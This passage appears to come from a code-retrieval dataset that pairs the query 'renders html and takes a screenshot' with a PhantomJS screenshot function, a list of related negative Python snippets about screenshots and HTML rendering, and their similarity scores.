\"\\n{0:>10}\\t{1:>10}\\t{2:>10}\\t{3:>10}\\n\".format(\"R\",\"Material\",\"d\",\"diameter\")\n for surface in self.lensSurfaces():\n prescription += \"{0:>10.2f}\\t{1:>10}\\t{2:>10.2f}\\t{3:>10.2f}\\n\".format(surface.R, str(surface.mat), surface.spacing, surface.diameter)\n return prescription", "def test_str(self):\n s1 = Square(4, 2, 3, 47)\n self.assertEqual(str(s1), \"[Square] (47) 2/3 - 4\")", "def primera_palabra_mayuscula(cadena):\n palabras = cadena.split(\" \")\n frase_final = \"\"\n for palabra in palabras: # recorro la palabra separada \n frase_final += palabra.capitalize() + \" \" # agarro la palabra separado y la primera letra la pongo en mayuscula \n return frase_final", "def basestr(cls: Any) -> str:\n return baserepr(cls)" ]
[ "0.5971977", "0.59691834", "0.5927014", "0.59089327", "0.58850706", "0.5883489", "0.5877891", "0.5867647", "0.58412963", "0.5805934", "0.57704586", "0.5736824", "0.57056093", "0.5686816", "0.5681042", "0.5671489", "0.5662893", "0.56376225", "0.5629446", "0.56220335", "0.5607931", "0.5601104", "0.5598237", "0.5593191", "0.55482614", "0.5536287", "0.5530084", "0.5498233", "0.5497834", "0.54927486", "0.54901236", "0.5487561", "0.54854167", "0.5484605", "0.5476983", "0.5460412", "0.545289", "0.5445977", "0.54436886", "0.54436886", "0.54436886", "0.54436886", "0.54436886", "0.5439312", "0.5436519", "0.54234964", "0.542262", "0.54191464", "0.5411185", "0.5410431", "0.5398833", "0.5392749", "0.5392749", "0.5392749", "0.5392749", "0.5383065", "0.5380118", "0.53790176", "0.53779054", "0.5373808", "0.5373808", "0.5373808", "0.5373808", "0.5373808", "0.53733176", "0.53733176", "0.5370966", "0.536941", "0.5363878", "0.5363663", "0.536291", "0.53612137", "0.5361174", "0.5359777", "0.53538", "0.5350581", "0.53436834", "0.53401315", "0.53388447", "0.53330886", "0.53283656", "0.53277653", "0.5326088", "0.5322", "0.53201634", "0.5319735", "0.5317267", "0.5316739", "0.5314059", "0.53082776", "0.5303636", "0.5302428", "0.5301727", "0.5300432", "0.52998805", "0.5296118", "0.52956223", "0.5287614", "0.5280274", "0.52775645" ]
0.599477
0
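The `stringToPila` document above calls a `Pila` constructor and an `apilar` helper that the record does not define. A minimal sketch of what those helpers could look like, assuming a simple linked-node stack (the node layout and names here are assumptions, not part of the record):

    class _Nodo:
        # One stack cell: a value plus a link to the cell below it.
        def __init__(self, dato, siguiente=None):
            self.dato = dato
            self.siguiente = siguiente

    class Pila:
        # Linked stack; `tope` points at the most recently pushed node.
        def __init__(self):
            self.tope = None

    def apilar(pila, elemento):
        # Push by prepending a new node in O(1).
        pila.tope = _Nodo(elemento, pila.tope)

With these definitions, `stringToPila("hola")` returns a stack whose top is `'a'` and whose bottom is `'h'`.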
renders html and takes a screenshot
def screenshot(url, path):
    # open in webpage
    driver = webdriver.PhantomJS()
    driver.set_window_size(1080, 800)
    driver.set_page_load_timeout(30)
    driver.get(url)
    driver.save_screenshot(path)
    driver.quit()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_screenshot(html_file, year):\r\n\tdriver = webdriver.PhantomJS()\r\n\tdriver.set_window_size(800, 800)\r\n\tdriver.get(html_file)\r\n\r\n\t#allows the page to load completely\r\n\ttime.sleep(2)\r\n\r\n\timage = 'images/' + str(year) + '.png'\r\n\r\n\tdriver.save_screenshot(image)\r\n\tdriver.quit()\r\n\r\n\tcrop_image(image, year)", "def preview():\r\n html = create_html_report()\r\n return html", "def screenshot(self):\n self.context.draw.window.screenshot(self.filename)", "def image_capture_demo():\n return render_template('image_capture_demo.html')", "async def capture_screenshot(self) -> bytes:", "def screen_shot():\n screen_shot_string_io = StringIO.StringIO()\n ImageGrab.grab().save(screen_shot_string_io, \"PNG\")\n screen_shot_string_io.seek(0)\n return screen_shot_string_io.read()", "def render(self, screen):\n pass", "def render(self, screen):\n pass", "def screenshot(filename):\n call([\"screencapture\", \"Screenshot for\" + strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()) + filename +\".jpg\"])", "def screenshot_tweet(id_str):\n try:\n driver = webdriver.PhantomJS()\n driver.set_window_size(1024, 768)\n driver.get('https://twitter.com/statuses/{}?lang=pt-br'.format(id_str))\n\n # getting element containing the tweet body\n element = driver.find_element_by_class_name('permalink-tweet-container')\n location = element.location\n size = element.size\n driver.save_screenshot('./screenshots/full_screenshot_{}.png'.format(id_str))\n driver.quit()\n\n # cropping the full screenshot around desired element\n im = Image.open('./screenshots/full_screenshot_{}.png'.format(id_str))\n left = location['x']\n top = location['y']\n right = location['x'] + size['width']\n bottom = location['y'] + size['height']\n im = im.crop((left, top, right, bottom))\n im.save('./screenshots/screenshot_{}.png'.format(id_str))\n os.remove('./screenshots/full_screenshot_{}.png'.format(id_str))\n return 'screenshot_{}.png'.format((id_str))\n except:\n return -1", "def display_html_report():\n display(HTML('report_page.html'))", "def view_html_page():\n\n return render_template(\"moby.html\")", "def takeScreenshot ():\n\n im = ImageGrab.grab()\n return im", "def to_html(self, result_dir):\n png_path = self.png_path(result_dir)\n data_table = self.html_data_table()\n return \"XXX figure html\"", "def fullpage_screenshot(self, file_name, viewport_height=0, fixed_header_loc=None, fixed_footer_loc=None):\n\n from PIL import Image\n import io\n\n driver = self.driver\n total_width = driver.execute_script(\"return document.body.offsetWidth\")\n total_height = driver.execute_script(\"return document.body.parentNode.scrollHeight\")\n viewport_width = driver.execute_script(\"return document.body.clientWidth\")\n if viewport_height == 0:\n viewport_height = driver.execute_script(\"return window.innerHeight\")\n rectangles = []\n\n def remote_fixed_section(locator):\n time.sleep(0.1)\n driver.execute_script(\"arguments[0].setAttribute('style', 'position: absolute; top: 0px;');\", locator)\n\n i = 0\n while i < total_height:\n ii = 0\n top_height = i + viewport_height\n\n if top_height > total_height:\n top_height = total_height\n\n while ii < total_width:\n top_width = ii + viewport_width\n\n if top_width > total_width:\n top_width = total_width\n\n rectangles.append((ii, i, top_width, top_height))\n\n ii = ii + viewport_width\n\n i = i + viewport_height\n\n stitched_image = Image.new('RGB', (total_width, total_height))\n previous = None\n part = 0\n\n for rectangle in rectangles:\n if previous is not None:\n 
driver.execute_script(\"window.scrollTo({0}, {1})\".format(rectangle[0], rectangle[1]))\n if fixed_footer_loc:\n remote_fixed_section(fixed_footer_loc)\n if fixed_header_loc:\n remote_fixed_section(fixed_footer_loc)\n if fixed_header_loc or fixed_footer_loc:\n time.sleep(0.1)\n\n screenshot = Image.open(io.BytesIO(driver.get_screenshot_as_png()))\n\n if rectangle[1] + viewport_height > total_height:\n offset = (rectangle[0], total_height - viewport_height)\n else:\n offset = (rectangle[0], rectangle[1])\n\n stitched_image.paste(screenshot, offset)\n\n del screenshot\n part = part + 1\n previous = rectangle\n\n driver.execute_script(\"window.scrollTo({0}, {1})\".format(0, 0))\n time.sleep(.1)\n stitched_image.save(file_name)", "def export_screenshot(self):\n\n if self.vis_type is None or len(self.vis_type) < 1:\n vis_type_suffix = ''\n else:\n vis_type_suffix = self.vis_type\n\n print(\"exporting screenshot for {}\".format(self.current_unit_id))\n ss_out_file = self.screenshot_dir / \"{}_{}_{}.{}\".format(\n self.current_unit_id, vis_type_suffix,\n cfg.screenshot_suffix, cfg.screenshot_format_ext)\n self.fig.savefig(ss_out_file, bbox_inches='tight', dpi=cfg.dpi_export_fig)", "def screenshot(self, name):\n screenshot_name = str(self.screenshot_count) + \"_\" + name + \".png\"\n self.log(\"Taking screenshot: \" + screenshot_name)\n # on Android, switching context to NATIVE_APP for screenshot\n # taking to get screenshots also stored to Testdroid Cloud\n # device run view. After screenshot switching back to\n # WEBVIEW. Works ok for Safari too.\n orig_context = self.driver.current_context\n self.driver.switch_to.context(\"NATIVE_APP\")\n self.driver.save_screenshot(self.screenshot_dir + \"/\" + screenshot_name)\n # only change context if originally context was WEBVIEW\n if orig_context not in self.driver.current_context:\n self.driver.switch_to.context(orig_context)\n self.screenshot_count += 1", "def capture_screenshot(self, output_path):\n self._driver.get_screenshot_as_file(str(output_path))", "def take_screenshot(browser, test_name):\n screenshot_file_path = \"screenshots/{}.png\".format(test_name)\n browser.save_screenshot(screenshot_file_path)", "def generate_image(encoded_url):\n url_to_fetch = urllib.parse.unquote_plus(encoded_url)\n # domain = os.environ.get('DOMAIN', 'https://casparwre.de')\n # if not url_to_fetch.startswith(domain):\n # app.logger.info(f'Not allowed to generate preview for this domain: {url_to_fetch}')\n # abort(405)\n app.logger.debug(f'Generating preview for {url_to_fetch}')\n driver.get(url_to_fetch)\n sleep(2)\n driver.set_window_size(1100, 600)\n\n screenshot_path = '/tmp/image.png'\n driver.save_screenshot(screenshot_path)\n output_size = (550,300)\n i = Image.open(screenshot_path)\n i.thumbnail(output_size)\n i.save(screenshot_path)\n # driver.quit()\n return send_file(screenshot_path, mimetype='image/png')", "def get_screenshot(self):\n method_name = self._testMethodName\n class_name = type(self).__name__\n time_now = datetime.now().strftime('%Y-%m-%d_%H-%M-%S')\n folder = os.path.dirname(os.getcwd())\n directory = \"\".join([folder, \"/test-results/\", class_name])\n\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n file_name = \"%s/%s - %s.png\" % (directory, time_now, method_name)\n\n self.driver.get_screenshot_as_file(file_name)\n print \"[[ATTACHMENT|%s]]\" % file_name\n print \"current url - %s\" % self.driver.current_url", "def print_html(html):\n display(HTML(html))", "def take_screeshot():\n\n # generate a unique identifier for the 
screenshot\n if not settings.screenshot_app:\n return ('Screenshots are disabled', 404)\n\n url, width, height = parse_querystring(request)\n\n if url is None:\n return ('Please provide a URL argument', 422)\n\n\n crop = request.args.get('crop', \"--crop\")\n if crop == \"no\": crop = \"--no-crop\"\n\n # find domain name\n parsed_uri = urlparse(url)\n domain = parsed_uri.netloc\n screenshot_path = os.path.join(settings.screenshots_path, domain)\n \n path = parsed_uri.path\n if not path: \n path = \"\"\n else:\n path = path[1:].replace(\"/\", \"%2F\")\n # construct file name\n filename = \"{path}___{size}___{timestamp}\".format(\n path=path,\n size=\"{0}x{1}\".format(width, height),\n timestamp=datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n )\n cwd = os.getcwd()\n\n mkdir = 'mkdir -p \"{0}\"'.format(screenshot_path)\n cd1 = 'cd \"{0}\"'.format(screenshot_path)\n cd2 = 'cd \"{0}\"'.format(cwd)\n take_screenshot = \"{screenshot_app} {url} {width}x{height} {crop} --filename '{filename}'\".format(\n screenshot_app=settings.screenshot_app,\n url=url,\n width=width,\n height=height,\n filename=filename,\n crop=crop\n )\n \n command = '{mkdir} && {cd1} && {take_screenshot} && {cd2}'.format(\n mkdir=mkdir,\n cd1=cd1,\n take_screenshot=take_screenshot,\n cd2=cd2\n )\n \n output = subprocess.call(command, stdout=subprocess.PIPE, shell=True)\n \n screenshot_identifier = domain + \"/\" + filename + \".png\"\n screenshot_url = SCREENSHOTS_ROOT + \"/\" + screenshot_identifier\n return jsonify(url=screenshot_url, id=screenshot_identifier)", "def screenshot(filestring):\r\n\r\n from pi3d.Display import Display\r\n LOGGER.info('Taking screenshot of \"%s\"', filestring)\r\n\r\n w, h = Display.INSTANCE.width, Display.INSTANCE.height\r\n size = h * w * 3\r\n img = (ctypes.c_char * size)()\r\n opengles.glReadPixels(0, 0, w, h, GL_RGB, GL_UNSIGNED_BYTE, ctypes.byref(img))\r\n\r\n im = Image.frombuffer('RGB', (w, h), img, 'raw', 'RGB', 0, 1)\r\n im = im.transpose(Image.FLIP_TOP_BOTTOM)\r\n im.save(filestring)", "def rawHTMLrendered(self):", "def takeScreenshot(self,name,description,type=-1,annotate=True):\n #framework? 
#test\n profbox()\n self.delayDisplay(description)\n\n if self.enableScreenshots == 0:\n return\n\n lm = slicer.app.layoutManager()\n # switch on the type to get the requested window\n widget = 0\n if type == -1:\n # full window\n widget = slicer.util.mainWindow()\n elif type == slicer.qMRMLScreenShotDialog().FullLayout:\n # full layout\n widget = lm.viewport()\n elif type == slicer.qMRMLScreenShotDialog().ThreeD:\n # just the 3D window\n widget = lm.threeDWidget(0).threeDView()\n elif type == slicer.qMRMLScreenShotDialog().Red:\n # red slice window\n widget = lm.sliceWidget(\"Red\")\n elif type == slicer.qMRMLScreenShotDialog().Yellow:\n # yellow slice window\n widget = lm.sliceWidget(\"Yellow\")\n elif type == slicer.qMRMLScreenShotDialog().Green:\n # green slice window\n widget = lm.sliceWidget(\"Green\")\n\n # grab and convert to vtk image data\n qpixMap = qt.QPixmap().grabWidget(widget)\n qimage = qpixMap.toImage()\n imageData = vtk.vtkImageData()\n slicer.qMRMLUtils().qImageToVtkImageData(qimage,imageData)\n \n if annotate==True:\n annotationLogic = slicer.modules.annotations.logic()\n annotationLogic.CreateSnapShot(name, description, type, self.screenshotScaleFactor, imageData)", "def take_screenshot(x, y, num=''):\n # screenshot takes starting x,y coordinates and then for how far the shot should stretch\n pic = pyautogui.screenshot(region=(0, y * 1.3, x * 0.75, y * 0.6))\n pic.save(\"Screenshot\" + str(num) + \".png\")", "def TakeScreenShot(rect):\r\n\r\n # Create a DC for the whole screen area\r\n dcScreen = wx.ScreenDC()\r\n\r\n # Create a Bitmap that will later on hold the screenshot image\r\n # Note that the Bitmap must have a size big enough to hold the screenshot\r\n # -1 means using the current default colour depth\r\n bmp = wx.EmptyBitmap(rect.width, rect.height)\r\n\r\n # Create a memory DC that will be used for actually taking the screenshot\r\n memDC = wx.MemoryDC()\r\n\r\n # Tell the memory DC to use our Bitmap\r\n # all drawing action on the memory DC will go to the Bitmap now\r\n memDC.SelectObject(bmp)\r\n\r\n # Blit (in this case copy) the actual screen on the memory DC\r\n # and thus the Bitmap\r\n memDC.Blit( 0, # Copy to this X coordinate\r\n 0, # Copy to this Y coordinate\r\n rect.width, # Copy this width\r\n rect.height, # Copy this height\r\n dcScreen, # From where do we copy?\r\n rect.x, # What's the X offset in the original DC?\r\n rect.y # What's the Y offset in the original DC?\r\n )\r\n\r\n # Select the Bitmap out of the memory DC by selecting a new\r\n # uninitialized Bitmap\r\n memDC.SelectObject(wx.NullBitmap)\r\n\r\n return bmp", "def img(self):\n return Image(self.driver.get_screenshot_as_png())", "def take_screenshot(self, filepath):\n self.driver.get_screenshot_as_file(filepath)", "def test_screenshots_generated():\n with temporary_dir() as output_dir:\n output_dir = Path(output_dir)\n copyfile(\n TEST_ROBOT_OUTPUT_FILES / \"robot_screenshots.xml\",\n output_dir / \"output.xml\",\n )\n open(output_dir / \"selenium-screenshot-1.png\", mode=\"w+\")\n open(output_dir / \"selenium-screenshot-2.png\", mode=\"w+\")\n\n flowtask = FlowTaskFactory()\n robot_importer.import_robot_test_results(flowtask, output_dir)\n\n # output.xml asset created\n assert 1 == BuildFlowAsset.objects.filter(category=\"robot-output\").count()\n # suite setup screenshot assets created\n assert 1 == BuildFlowAsset.objects.filter(category=\"robot-screenshot\").count()\n # No screenshots created for 'Via API' test\n tr_method = models.TestMethod.objects.get(name=\"Via API\")\n 
test_api = models.TestResult.objects.get(method=tr_method, task=flowtask)\n assert 0 == test_api.assets.count()\n\n # One screenshot created for 'Via UI' test\n tr_method = models.TestMethod.objects.get(name=\"Via UI\")\n test_ui = models.TestResult.objects.get(method=tr_method, task=flowtask)\n assert 1 == test_ui.assets.count()", "def show_me():\n # Scumbag thumbnail code\n try:\n from PIL import Image\n except ImportError:\n pass\n else:\n filename = os.path.join(app.static_folder, 'img', 'badumtss.png')\n image = Image.open(filename)\n\n return render_template('show_me.html')", "def take_desktop_screenshot(self):\n filepath = self._get_screenshot_path(\"whitelib_screenshot_{index}.png\")\n directory = os.path.dirname(filepath)\n if not os.path.exists(directory):\n os.makedirs(directory)\n logger.info(get_link_path(filepath, self._log_directory))\n logger.info(\n '</td></tr><tr><td colspan=\"3\">'\n '<a href=\"{src}\"><img src=\"{src}\" width=\"800px\"></a>'.format(\n src=get_link_path(filepath, self._log_directory)\n ),\n html=True,\n )\n bmp = Desktop.CaptureScreenshot()\n bmp.Save(filepath, ImageFormat.Png)\n return filepath", "def __take_screenshot(web_driver: webdriver, test_name: str):\n root_dir = os.path.dirname(os.path.abspath(__file__)).replace(\"tests\", \"reports\")\n file_name = f\"{str(datetime.datetime.now().timestamp())}_{test_name}.jpg\"\n screenshot_file_path = os.path.join(root_dir, file_name)\n web_driver.save_screenshot(screenshot_file_path)", "def render_camera_view():\n return render_template('inspection_screen_new.html', travel_distance=distance, the_inspection_time=elapsed_time, realsense_device_status=realsense_enabled, detector_enabled=enable_detection, detections=detections_results, report_details=inspection_report)", "def test_screenshot_then_show():\n vpl.figure()\n vpl.quick_test_plot()\n vpl.screenshot_fig()\n vpl.show()", "def result(self):\n return self.tmpl_out(\"result.html\",\n height=image(self.work_dir\n + 'output.png').size[1])", "def screenshot(G, folderpath, filename):\n imagepath = os.path.join(folderpath, \"{filename}.png\")\n log(f\"SCREENSHOT {imagepath} with {G.order()} nodes, {G.size()} edges\")\n A = nx.nx_agraph.to_agraph(G)\n A.graph_attr.update()\n A.draw(path=imagepath, prog=\"dot\")", "def save_image(html_path: str, image_file_path: str) -> None:\n options = Options()\n options.add_argument(\"--headless\")\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--disable-dev-shm-usage\")\n chrome_prefs = dict()\n options.experimental_options[\"prefs\"] = chrome_prefs\n chrome_prefs[\"profile.default_content_settings\"] = {\"images\": 2}\n\n tmpurl = 'file://{path}/{mapfile}'.format(path=os.getcwd(), mapfile=html_path)\n\n browser = webdriver.Chrome(executable_path='./chromedriver', options=options)\n browser.get(tmpurl)\n time.sleep(2)\n browser.save_screenshot(image_file_path)\n browser.quit()", "def takeScreenshot(self, driver):\n fileName = str(round(time.time() * 1000)) + \".png\"\n screenshotDirectory = \"/Users/echalo/PycharmProjects/ICP Framwork/screenshots\"\n destinationFile = screenshotDirectory + fileName\n\n try:\n driver.save_screenshot(destinationFile)\n print(\"Screenshot saved to directory --> :: \" + destinationFile)\n except NotADirectoryError:\n print(\"Not a directory issue\")", "def download_screenshot_command():\n # 1. Get input scan id and resolution from Demisto\n scanid = demisto.args().get('scanid')\n resolution = demisto.args().get('resolution')\n # 2. 
Get the forensic webpage screenshot from SlashNext API\n response = download_screenshot(scanid=scanid, resolution=resolution)\n if response.get('errorNo') != 0:\n return\n # 3. Parse and format the response\n sc_base64 = response.get('scData').get('scBase64')\n sc_data = base64.b64decode(sc_base64)\n\n sc_file = fileResult('slashnext_{}.jpg'.format(scanid), sc_data, entryTypes['image'])\n\n demisto.results({\n 'Type': entryTypes['image'],\n 'ContentsFormat': formats['text'],\n 'Contents': 'Forensics: Webpage Screenshot for URL Scan ID = {}'.format(scanid),\n 'File': sc_file.get('File'),\n 'FileID': sc_file.get('FileID')\n })", "def draw(self, stats=[]):\n clear_output(wait=True)\n svg_html = self.to_html(stats)\n display(svg_html)", "def screenshot(self, name=None, scale=None):\n\n if not self.is_rendered:\n self.render(interactive=False)\n\n timestamp = datetime.now().strftime(\"%Y%m%d_%H%M%S\")\n name = name or f\"brainrender_screenshot_{timestamp}\"\n if \".png\" not in name:\n name += \".png\"\n\n scale = scale or settings.SCREENSHOT_SCALE\n\n print(f\"\\nSaving new screenshot at {name}\\n\")\n\n savepath = str(self.screenshots_folder / name)\n logger.debug(f\"Saving scene at {savepath}\")\n self.plotter.screenshot(filename=savepath, scale=scale)\n return savepath", "def screenshot(self, locator: Locator, filename: Union[str, Path]) -> str:\n return super().screenshot(locator, filename)", "def get_html(self):\r\n context = {\r\n 'display_name': self.display_name_with_default,\r\n 'instructions_html': self.instructions,\r\n 'annotation_storage': self.annotation_storage_url,\r\n 'token': retrieve_token(self.user, self.annotation_token_secret),\r\n 'tag': self.instructor_tags,\r\n 'openseadragonjson': self.openseadragonjson,\r\n }\r\n\r\n return self.system.render_template('imageannotation.html', context)", "def get_screen():\n img_title = 'screen_' + g.client_id + '.png'\n image_path = STATIC_FILES_PATH + img_title\n if g.driver_status != WhatsAPIDriverStatus.LoggedIn:\n try:\n g.driver.get_qr(image_path)\n return send_file(image_path, mimetype='image/png')\n except Exception as err:\n pass\n g.driver.screenshot(image_path)\n return send_file(image_path, mimetype='image/png')", "def _repr_html_(self) -> str:\n # Speical case inside Google Colab\n if \"google.colab\" in sys.modules:\n load_notebook(hide_banner=True)\n script, div, _ = notebook_content(self.to_render)\n return f\"{div}<script>{script}</script>\"\n\n # Windows forbids us open the file twice as the result bokeh cannot\n # write to the opened temporary file.\n with NamedTemporaryFile(suffix=\".html\", delete=False) as tmpf:\n pass\n\n save(\n self.to_render,\n filename=tmpf.name,\n resources=CDN,\n template=INLINE_TEMPLATE,\n title=\"DataPrep.EDA Report\",\n )\n with open(tmpf.name, \"r\") as f:\n output_html = f.read()\n\n # Delete the temporary file\n Path(tmpf.name).unlink()\n\n # Fix the bokeh: bokeh wrongly call the \"waiting for bokeh to load\" function\n # inside \"Bokeh.safely\", which causes Bokeh not found because\n # Bokeh is even not loaded!\n patched_html = output_html.replace(\n \"Bokeh.safely\",\n \"var __dataprep_bokeh_fix = (f) => document.Bokeh === undefined ? 
setTimeout(f, 1000) : f(); __dataprep_bokeh_fix\", # pylint: disable=line-too-long\n )\n # embed into report template created by us here\n return patched_html", "def show_browser(self) -> None:\n\n # set delete = False to avoid early delete when user open multiple plots.\n with NamedTemporaryFile(suffix=\".html\", delete=False) as tmpf:\n save(\n self.to_render,\n filename=tmpf.name,\n resources=CDN,\n title=\"DataPrep.EDA Report\",\n )\n webbrowser.open_new_tab(f\"file://{tmpf.name}\")", "def takeScreenshot(self, name, description, type=-1, annotate=True):\r\n # framework? #test\r\n profbox()\r\n self.delayDisplay(description)\r\n\r\n if self.enableScreenshots == 0:\r\n return\r\n\r\n lm = slicer.app.layoutManager()\r\n # switch on the type to get the requested window\r\n widget = 0\r\n if type == -1:\r\n # full window\r\n widget = slicer.util.mainWindow()\r\n elif type == slicer.qMRMLScreenShotDialog().FullLayout:\r\n # full layout\r\n widget = lm.viewport()\r\n elif type == slicer.qMRMLScreenShotDialog().ThreeD:\r\n # just the 3D window\r\n widget = lm.threeDWidget(0).threeDView()\r\n elif type == slicer.qMRMLScreenShotDialog().Red:\r\n # red slice window\r\n widget = lm.sliceWidget(\"Red\")\r\n elif type == slicer.qMRMLScreenShotDialog().Yellow:\r\n # yellow slice window\r\n widget = lm.sliceWidget(\"Yellow\")\r\n elif type == slicer.qMRMLScreenShotDialog().Green:\r\n # green slice window\r\n widget = lm.sliceWidget(\"Green\")\r\n\r\n # grab and convert to vtk image data\r\n qpixMap = qt.QPixmap().grabWidget(widget)\r\n qimage = qpixMap.toImage()\r\n imageData = vtk.vtkImageData()\r\n slicer.qMRMLUtils().qImageToVtkImageData(qimage, imageData)\r\n\r\n if annotate == True:\r\n annotationLogic = slicer.modules.annotations.logic()\r\n annotationLogic.CreateSnapShot(name, description, type, self.screenshotScaleFactor, imageData)", "def print_html_report(report, title, img_name):\n import jinja2\n\n template_loader = jinja2.FileSystemLoader(searchpath=\"./\")\n template_env = jinja2.Environment(loader=template_loader)\n template_file = \"template.html\"\n template = template_env.get_template(template_file)\n heads = [\"Name\", \"Version\", \"Size\"]\n heads_comp = [\"Name\", \"Size\", \"Component\"]\n output_text = template.render(pips=report[\"pips\"],\n rpms=report[\"rpms\"],\n apts=report[\"apts\"],\n files_list=report[\"files\"],\n bundles=report[\"bundles\"],\n heads=heads,\n heads_comp=heads_comp,\n img_name=img_name,\n title=title)\n report_title = 'report_%s.html' % (title)\n html_file = open(report_title, 'w')\n html_file.write(output_text)\n html_file.close()", "def screenShot(self, cam=None, path=os.path.expanduser('~'), basenm='view'):\n if cam is None:\n # This allows use to dynamicly select cameras\n cam = GetActiveCamera()\n os.chdir(path)\n self.view(cam=cam)\n WriteImage(\"%s.png\" % (basenm))", "def display_html_snapshots_widget():\n if not get_ipython():\n print('The HTML snapshot widget cannot be display in environments other than IPython.')\n return\n\n # Configure notebook display preferences to better suit this UI. 
These display settings\n # will be in effect for all cells in the notebook run after this one is run.\n pd.set_option('display.max_colwidth', None)\n pd.set_option('display.max_rows', None)\n get_ipython().run_cell_magic(\n 'javascript',\n '',\n '''// Display cell outputs to full height (no vertical scroll bar)\n IPython.OutputArea.auto_scroll_threshold = 9999;''')\n\n # Retrieve the workspace metadata for the current user and environment.\n ws_meta = WorkspaceMetadata()\n workspace_names2id = collections.OrderedDict(sorted(\n ws_meta.get_workspace_name_to_id_mapping().items()))\n workspace_names2id_include_readonly = collections.OrderedDict(sorted(\n ws_meta.get_workspace_name_to_id_mapping(include_private_readonly=True).items()))\n workspace_ids2bucket_include_readonly = ws_meta.get_workspace_id_to_bucket_mapping(include_private_readonly=True)\n workspace_paths = {k: WorkspacePaths(workspace_bucket=v)\n for k, v in workspace_ids2bucket_include_readonly.items()}\n\n ui_output = widgets.Output()\n\n ui_tabs = widgets.Tab()\n ui_tabs.children = [create_html_snapshot_widget(ws_names2id=workspace_names2id,\n ws_paths=workspace_paths,\n output=ui_output),\n create_view_files_widget(ws_names2id=workspace_names2id_include_readonly,\n ws_paths=workspace_paths,\n output=ui_output),\n create_view_all_comments_widget(ws_names2id=workspace_names2id_include_readonly,\n ws_paths=workspace_paths,\n output=ui_output)]\n ui_tabs.set_title(title='Create', index=0)\n ui_tabs.set_title(title='View one', index=1)\n ui_tabs.set_title(title='View all', index=2)\n\n display(ui_tabs, ui_output)", "def screenshot():\n\tprint(\"Taking screenshot...\")\n\twith mss.mss() as screenshot:\n\t\tmonitor = screenshot.monitors[0]\n\t\tshot = screenshot.grab(monitor)\n\t\tframe = np.array(Image.frombytes(\"RGB\", (shot.width, shot.height), shot.rgb))\n\t\tframe_2 = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n\treturn computer_hash(frame_2)", "def take_screenshot(self, filename):\n self.scene.capture(filename)", "async def capture_and_upload_screenshot(self) -> None:", "def takeScreenshot(self, driver):\n\n fileName = str(round(time.time() * 1000)) + \".png\"\n screenshotDirectory = \"C://Users/Mathe/Desktop//Selenium WebDriver with Python 3.x/Advanced/\"\n destinationFile = screenshotDirectory + fileName\n try:\n driver.save_screenshot(destinationFile)\n print(\"Screenshot saved to directory -> \" + destinationFile)\n except NotADirectoryError:\n print(\"Not a directory issue!!\")", "def create_html_report():\r\n\r\n #Sample DataFrame\r\n df = pd.DataFrame(np.random.randn(7,4)\r\n ,columns=['one','two','three','four']\r\n ,index=['a','b','c','d','e','f','g'])\r\n\r\n #Formatting rule\r\n def color_negative_red(val):\r\n color = 'red' if val<0 else 'black'\r\n return f'color: {color}'\r\n\r\n styler = df.style.applymap(color_negative_red)\r\n\r\n #Chart plotting\r\n filename = \"\".join([APP_ROOT, \"\\\\static\\\\images\\\\\" , \"plot.svg\"])\r\n #Plot\r\n ax = df.plot.bar()\r\n fig = ax.get_figure()\r\n fig.savefig(filename)\r\n\r\n #Template handling\r\n env = jinja2.Environment(loader=jinja2.FileSystemLoader(searchpath='./templates/'))\r\n template = env.get_template('template.html')\r\n\r\n filename = \"file:///\" + filename\r\n html = template.render(my_table=styler.render(), img_url=filename)\r\n\r\n return html", "def _repr_html_(self):\n import io\n import base64\n from PIL import Image\n\n library_name = \"vedo.assembly.Assembly\"\n help_url = \"https://vedo.embl.es/docs/vedo/assembly.html\"\n\n arr = 
self.thumbnail(zoom=1.1, elevation=-60)\n\n im = Image.fromarray(arr)\n buffered = io.BytesIO()\n im.save(buffered, format=\"PNG\", quality=100)\n encoded = base64.b64encode(buffered.getvalue()).decode(\"utf-8\")\n url = \"data:image/png;base64,\" + encoded\n image = f\"<img src='{url}'></img>\"\n\n # statisitics\n bounds = \"<br/>\".join(\n [\n vedo.utils.precision(min_x, 4) + \" ... \" + vedo.utils.precision(max_x, 4)\n for min_x, max_x in zip(self.bounds()[::2], self.bounds()[1::2])\n ]\n )\n\n help_text = \"\"\n if self.name:\n help_text += f\"<b> {self.name}: &nbsp&nbsp</b>\"\n help_text += '<b><a href=\"' + help_url + '\" target=\"_blank\">' + library_name + \"</a></b>\"\n if self.filename:\n dots = \"\"\n if len(self.filename) > 30:\n dots = \"...\"\n help_text += f\"<br/><code><i>({dots}{self.filename[-30:]})</i></code>\"\n\n allt = [\n \"<table>\",\n \"<tr>\",\n \"<td>\",\n image,\n \"</td>\",\n \"<td style='text-align: center; vertical-align: center;'><br/>\",\n help_text,\n \"<table>\",\n \"<tr><td><b> nr. of objects </b></td><td>\"\n + str(self.GetNumberOfPaths())\n + \"</td></tr>\",\n \"<tr><td><b> position </b></td><td>\" + str(self.GetPosition()) + \"</td></tr>\",\n \"<tr><td><b> diagonal size </b></td><td>\"\n + vedo.utils.precision(self.diagonal_size(), 5)\n + \"</td></tr>\",\n \"<tr><td><b> bounds </b> <br/> (x/y/z) </td><td>\" + str(bounds) + \"</td></tr>\",\n \"</table>\",\n \"</table>\",\n ]\n return \"\\n\".join(allt)", "def camera():\n return render_template('home/cam.html')", "def test_html_output(self):\n pass", "def _repr_html_(self):\n\n import numpy as np\n import matplotlib.pyplot as plt\n from .._tier9 import imshow\n\n\n size_in_pixels = np.prod(self.shape)\n size_in_bytes = size_in_pixels * self.dtype.itemsize\n\n labels = (self.dtype == np.uint32)\n\n # In case the image is 2D, 3D and larger than 100 pixels, turn on fancy view\n if len(self.shape) in (2, 3) and size_in_pixels >= 100:\n import matplotlib.pyplot as plt\n imshow(self,\n labels=labels,\n continue_drawing=True,\n colorbar=not labels)\n image = self._png_to_html(self._plt_to_png())\n else:\n return \"<pre>cle.array(\" + str(np.asarray(self)) + \", dtype=\" + str(self.dtype) + \")</pre>\"\n\n\n if size_in_bytes > 1024:\n size_in_bytes = size_in_bytes / 1024\n if size_in_bytes > 1024:\n size_in_bytes = size_in_bytes / 1024\n if size_in_bytes > 1024:\n 